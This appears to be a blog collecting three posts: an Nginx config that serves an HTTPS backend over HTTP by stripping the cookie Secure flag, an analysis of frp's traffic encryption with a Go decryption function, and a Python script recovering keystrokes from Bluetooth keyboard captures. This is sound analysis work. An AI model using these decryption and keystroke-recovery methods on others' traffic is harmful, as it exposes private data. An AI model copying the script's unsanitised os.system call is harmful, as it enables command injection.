
问题背景参考原文，用以下配置运行 Ngnix， 使其用 HTTP 协议在 9080 端口反向代理 19026 上的 HTTPS 服务。

1
2
3
4
5
6
7
8
9
10
11
12
13
14

server {
    listen       9080;
    server_name  10.115.6.165;

    location /databoard/ {
        proxy_pass  https://10.115.6.165:19026/databoard/;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For    $proxy_add_x_forwarded_for;
        proxy_set_header REMOTE-HOST        $remote_addr;
        proxy_set_header X-Forwarded-Proto  $scheme;
        proxy_redirect off;
    }
}

但是如果我们用浏览器访问 http://10.115.6.165:9080/databoard/login ,就会发现如下图所示的两问题：

后端服务使用 redirect 重定向导致的问题

浏览器地址栏上显示被重定向到了https://10.115.6.165/databoard/dataCmder .

这是因为后端Web应用执行了redirect重定向语句，而重定向的协议、地址是基于web应用上下文的，而nginx并没有做特别的处理就转发给了浏览器，浏览器自然不能访问到这个地址。解决办法如下：

1
2
3
4
5
6
7
8
9
10

map $upstream_http_Location $location {
  ~https://10.115.6.165/(?<param>.*) http://10.115.6.165:9080/$param;
  default $upstream_http_Location;
}

server {
    ... ...
    location /databoard/ {
        ... ...
        more_set_headers -s '301 302' 'Location $location';

Cookie 携带 Secure 属性问题

Cookie的Secure属性，意味着保持Cookie通信只限于加密传输，指示浏览器仅仅在通过安全/加密连接才能使用该Cookie，而我们的需求是以HTTP方式传送。如果不去掉，浏览器会提示不接受这个Cookie。

对于该问题，原文采用的方案是通过nginx的more_set_headers模块，通过map中正则表达式对Set-Cookie进行改写。

但该方案会导致Set-Cookie直接从secure属性的前面截断，如果secure属性在中间，或者是有多个Set-Cookie属性时，就无法适用。

经过查阅 Nginx官方文档中的 Module ngx_http_proxy_module ，发现从nginx 1.19.3开始，加入了proxy_cookie_flags的directive，恰好可以去掉secure属性并且加入samesite属性（如果不加入samesite属性，浏览器一样会拒绝）。

因此，完整配置如下：

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30

map $upstream_http_Location $location {
  ~https://10.115.6.165/(?<param>.*) http://10.115.6.165:9080/$param;
  default $upstream_http_Location;
}

map $sent_http_set_cookie $resp_cookie {
    ~*(?<CK_WITHOUT_SECURE>.+)Secure $CK_WITHOUT_SECURE;
}

server {
    listen       9080;
    server_name  10.115.6.165;

    location /databoard/ {
        proxy_pass  https://10.115.6.165:19026/databoard/;

        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For    $proxy_add_x_forwarded_for;
        proxy_set_header REMOTE-HOST        $remote_addr;
        proxy_set_header X-Forwarded-Proto  $scheme;
        proxy_redirect off;

        more_set_headers -s '301 302' 'Location $location';
        
        # 主要看下面的部分
        # more_set_headers 'Set-Cookie: $resp_cookie';        # 取消原文中的替换
        proxy_cookie_flags ~ nosecure samesite=strict;        # 调整为官方的方法
    }
}

成功去掉了secure属性，加上了samesite属性。

但是，需要注意的more_set_headers仅在Nginx 1.19.3以上才支持，因此您需要升级Nginx版本，以使用该方案。

Ubuntu编译安装新版本Nginx并加入相关模块支持

如果不清楚如何升级自己的Nginx，可以参考以下。

执行 apt search nginx 会发现Ubuntu22.04的apt源中nginx版本太老，为1.18.0，不能满足我们的需求。

因此需要从源码编译安装，需要注意的是添加OpenSSL模块（不然无法代理HTTPS的服务）、并且添加 headers-more-nginx-module 这个附加模块。 (https://github.com/openresty/headers-more-nginx-module)

使用以下命令进行编译配置。

完成后 make && sudo make install 即可。

安装完毕之后， 默认路径在 /usr/local/nginx/sbin/nginx，因此可以 sudo ln -s /usr/local/nginx/sbin/nginx /usr/bin/nginx 建立一个软链接。

编译安装的nginx默认没有sites-enabled这个目录，可以手工在其conf目录新建一个，并且在nginx.conf中引入:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

# nginx.conf

events {
    worker_connections  1024;
}


http {
    include       mime.types;
    default_type  application/octet-stream;

    ...
    ...

    include /usr/local/nginx/conf/sites-enabled/*;

}

随后将其注册为 systemd 服务，在 /etc/systemd/system 新建一个 nginx.service :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

# /etc/systemd/system/nginx.service

[Unit]
Description=nginx - high performance web server
After=network.target remote-fs.target nss-lookup.target

[Service]
Type=forking
PIDFile=/usr/local/nginx/logs/nginx.pid
ExecStart=/usr/local/nginx/sbin/nginx -c /usr/local/nginx/conf/nginx.conf
ExecReload=/usr/local/nginx/sbin/nginx -s reload
ExecStop=/usr/local/nginx/sbin/nginx -s stop
PrivateTmp=true

[Install]
WantedBy=multi-user.target

记得 sudo systemctl daemon-reload 重载服务，再 sudo systemctl start nginx 即可运行。

由于网络上几乎没有分析frp协议及其加密机制的文章，而且frp每个版本的加密逻辑还不一样（例如0.38.0与0.52.0），笔者跟了一遍源码，简单记下这篇文章，供相关从业者参考。

##结论

• 加密算法：AES-CFB
• iv：首次发送报文时向对方传递
• salt：固定盐值
• 会话密钥：用配置文件里的token以pbkdf2算法派生

分析过程

首先下载源码，搜索关键字encrypt，发现一处可能与加密相关的地方，跟进去。

发现引用了frpIo这个包，而这个包是从github引用，去它仓库克隆下代码来。

很明显WithEncryption就是加密逻辑的入口：传入密钥，对读写函数进行封装。

跟进NewReader()函数，找到具体的加密逻辑：

+ 第一步，使用pbkdf2算法从主密钥派生出会话密钥。需要的参数及寻找位置如下：
+ 主密钥：从frp代码的/server/control.go中发现，主密钥就是serverCfg.Token，也就是我们配置文件frps.iniCommon中的token字段。

+ 盐值：从frp代码的/server/main.go入口函数中找到，默认是"frp"。

+ 迭代次数：固定64。
+ 输出长度：与aes每个block长度一致，默认为16字节。
+ 哈希函数：固定为sha1。

+ 第二步，生成iv向量。虽然代码注释上写着“random iv”，但查看代码发现，iv只初始化了大小，没有赋值，因此固定是16字节的0.**当时狠狠坑了我好长时间**+ 第三步，AES CFB加密。这点需要了解基础的密码学常识，在CFB模式下首部不能有多余字符，否则分组错乱，整个密文解开都是错的。而在抓包分析时，经常有使用0或者其他标志填充首部，这点也容易导致解密失败。**编写解密脚本时需要注意。**

解密脚本编写

到此为止，整个加密逻辑就很清楚了。可以参照源码，用go编写解密脚本如下：

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22

func Decrypt(token, ciphertext, iv []byte) ([]byte, error) {
// 根据你的需求处理 token，用作密钥
key := pbkdf2.Key(token, []byte(DefaultSalt), 64, aes.BlockSize, sha1.New)

// 创建 AES 加密块
block, err := aes.NewCipher(key)
if err != nil {
return nil, err
}

// 检查密文长度是否有效
if len(ciphertext) == 0 {
return nil, fmt.Errorf("empty ciphertext")
}

// 使用 CFB 解密模式
stream := cipher.NewCFBDecrypter(block, iv)
stream.XORKeyStream(ciphertext, ciphertext)

return ciphertext, nil
}

总结

总结来说，frp是用配置文件里的token以pbkdf2算法派生会话密钥；首次发送报文时向对方传递iv；使用固定值作为salt；采用AES-CFB模式对流量进行加密。

蓝牙键盘的按键还原与普通USB键盘有些许区别，但是在网上只找到了一个很好用的USB键盘流量包解析脚本，没有找到蓝牙键盘的。随后稍微研究了一下，加入蓝牙键盘解析的支持。

脚本已放到Github：https://github.com/BaiHLiu/Bluetooth-UsbKeyboardDataHacker

工具说明

• 抓包工具：Wireshark 4.2.0
• 系统环境：Windows 11
• 键盘型号：罗技 K585
• 脚本运行：Ubuntu18.04

流量分析

普通USB键盘数据包的数据长度为 8 个字节，击键信息集中在第 3 个字节。但对蓝牙ATT流量进行分析后发现，击键信息应该是在第 2 个字节。

脚本改造

主要需要修改tshark过滤字段，以及下面解析字节时的位置。

测试后发现所有键盘、Shift键等均可正确解析。

代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60

import sys
import os

DataFileName = "usb.dat"

presses = []

normalKeys = {"04":"a", "05":"b", "06":"c", "07":"d", "08":"e", "09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j", "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o", "13":"p", "14":"q", "15":"r", "16":"s", "17":"t", "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y", "1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4", "22":"5", "23":"6","24":"7","25":"8","26":"9","27":"0","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\\","32":"<NON>","33":";","34":"'","35":"<GA>","36":",","37":".","38":"/","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}

shiftKeys = {"04":"A", "05":"B", "06":"C", "07":"D", "08":"E", "09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J", "0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O", "13":"P", "14":"Q", "15":"R", "16":"S", "17":"T", "18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y", "1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$", "22":"%", "23":"^","24":"&","25":"*","26":"(","27":")","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"<NON>","33":":","34":"\"","35":"<GA>","36":"<","37":">","38":"?","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}

def main():
    # check argv
    if len(sys.argv) != 2:
        print("Usage : ")
        print("        python UsbKeyboardHacker.py data.pcap")
        print("Tips : ")
        print("        To use this python script , you must install the tshark first.")
        print("        You can use `sudo apt-get install tshark` to install it")
        print("Author : ")
        print("        WangYihang <wangyihanger@gmail.com>")
        print("        If you have any questions , please contact me by email.")
        print("        Thank you for using.")
        exit(1)

    # get argv
    pcapFilePath = sys.argv[1]
    
    # get data of pcap
    os.system("tshark -r %s -Y 'bthci_acl && btatt' -T fields -e btatt.value > %s" % (pcapFilePath, DataFileName))

    # read data
    with open(DataFileName, "r") as f:
        for line in f:
            presses.append(line[0:-1])
    # handle
    result = ""
    for press in presses:
        if press == '':
            continue
        if ':' in press:
            Bytes = press.split(":")
        else:
            Bytes = [press[i:i+2] for i in range(0, len(press), 2)]
        if Bytes[0] == "00":
            if Bytes[1] != "00" and normalKeys.get(Bytes[1]):
                result += normalKeys[Bytes[1]]
        elif int(Bytes[0],16) & 0b10 or int(Bytes[0],16) & 0b100000: # shift key is pressed.
            if Bytes[1] != "00" and normalKeys.get(Bytes[1]):
                result += shiftKeys[Bytes[1]]
        else:
            print("[-] Unknow Key : %s" % (Bytes[0]))
    print("[+] Found : %s" % (result))

    # clean the temp data
    os.system("rm ./%s" % (DataFileName))


if __name__ == "__main__":
    main()